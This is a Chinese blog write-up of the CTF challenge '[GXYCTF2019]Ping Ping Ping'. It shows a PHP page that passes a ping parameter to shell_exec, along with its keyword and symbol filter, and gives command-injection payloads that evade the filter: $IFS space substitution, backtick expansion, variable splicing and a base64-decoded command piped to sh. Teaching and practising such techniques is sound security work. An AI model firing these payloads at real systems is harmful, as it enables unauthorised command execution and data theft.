BUUCTF:[GXYCTF2019]Ping Ping Ping

最新推荐文章于 2024-01-09 10:49:28 发布
最新推荐文章于 2024-01-09 10:49:28 发布
阅读量2k 收藏
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/109180116
版权

题目地址:https://buuoj.cn/challenges#[GXYCTF2019]Ping%20Ping%20Ping

在这里插入图片描述
在这里插入图片描述
?ip=明显存在命令执行注入,使用;或者|闭合上一条命令

经过fuzz测试,过滤了空格、bash字符、flag字符、以及一些特殊符号

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 空格绕过这里使用$IFS$9
/?ip=;id;whoami;pwd;ls;ls$IFS$9-lha

在这里插入图片描述
我做题时用的是

/?ip=;cat$IFS$9`ls`

直接将当前目录下所有文件全部cat出来,查看源码发现flag

在这里插入图片描述
题目源码

<?php
if(isset($_GET['ip'])){
  $ip = $_GET['ip'];
  if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "<pre>";
  print_r($a);
}
?>

贴一下在网上看到的别的方法

/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
/?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
.......
[BUUCTF]-Web:[GXYCTF2019]Ping Ping Ping解析(贪婪匹配,空格过滤)
2301_79326813的博客
01-31 1571
先看网页按照正常流程,先ip+ls,可以看到flag但是不能直接得flag,他应该是过滤掉了一点东西。这里考虑过滤掉了空格。
BUUctf [GXYCTF2019]Ping Ping Ping
qq_61988806的博客
10-28 1336
BUUctf [GXYCTF2019]Ping Ping Ping
[GXYCTF2019]Ping Ping Ping
qq_42404383的博客
09-03 544
[GXYCTF2019]Ping Ping Ping 题目: 引入眼帘的是一片空白,只有/?id= 看到/?ip=、随便构造一个payload 分析: 考点是远程命令执行?继续尝试改造payload 老老实实走常规路线,查看目录文件,找到flag.php 无法直接cat flag.php 解题: 考绕过的知识点? 命令执行漏洞利用及绕过方式总结 空格过滤 paload ==> ?ip=1;cat$IFS$1index.php 成功访问、给了提示、bash、flag、和一些字符被过滤
buuctf [GXYCTF2019]Ping Ping Ping
SopRomeo的博客
03-15 871
进去就要我们ping ip ,看看能不能命令执行 ?ip=127.0.01;ls发现可行 看到有flag ,不能cat,可远观而不可亵玩呼! 百度了命令执行绕过方法 试了很久,个人觉得这题有bug a=a.php;b=fl;c=cat;$c$b$a 如果把ag.php放后面就不行… a=cat;b=fl;c=ag.php;$c$b$a flag在源代码里 ...
[GXYCTF 2019]Ping Ping Ping
m0_62422842的博客
05-08 8290
前言 最近在学习ssrf漏洞,这个漏洞的综合性还是挺强的。在网上看了大佬的文章总结的很详细。在此基础就通过实践相结合,更加深入的理解ssrf的具体操作。 SSRF漏洞 有一些函数比如
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5453
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
BUUCTF[GXYCTF2019]Ping Ping Ping
楼阁de猫的博客
12-19 348
[GXYCTF2019]Ping Ping Ping 直接ping 127.0.0.1 有回显,ls一下 发现flag.php,cat一下 事情果然没有这么简单,这里空格被过滤了,下面有几种绕过空格的方法 $IFS ${IFS} $IFS$9 //$9改成 $ 加其他数字貌似都行 < <> {cat,flag.php} //用逗号实现了空格功能 %20 (space) %09(Tab) 这里用 $IFS$9绕过空格之后,发现flag又被ban了,那就cat一下index.p
BUUCTF_[GXYCTF2019]Ping Ping Ping解题思路
时光不老的博客
01-09 491
[GXYCTF2019]Ping Ping Ping解题思路
[GXYCTF2019]PING PING PING
車鈊的博客
08-19 711
观察题目: 页面: /?ip= 主网址: http://09703780-fff4-4a8d-be6c-496d349f5c74.node3.buuoj.cn/ 解题: 扫描目录: ?ip=127.0.0.1;ls >> flag.php index.php 尝试读文件: ?ip=127.0.0.1;cat%20flag.php >> /?ip= 1fxck your space! 屏蔽了空格 替换空格: ?ip=127.0.0.1;cat$IFS$1flag.php
[GXYCTF2019]Ping Ping Ping 1
最新发布
01-09
针对 GXYCTF2019 中名为 'Ping Ping Ping' 的挑战题,该题目属于网络安全竞赛中的网络层攻击与防御类别。虽然提供的参考资料主要讨论了连续提示上的后门攻击[^1],这与具体 CTF 题目不完全匹配,但可以借鉴其中关于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末 初

谢谢老板!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值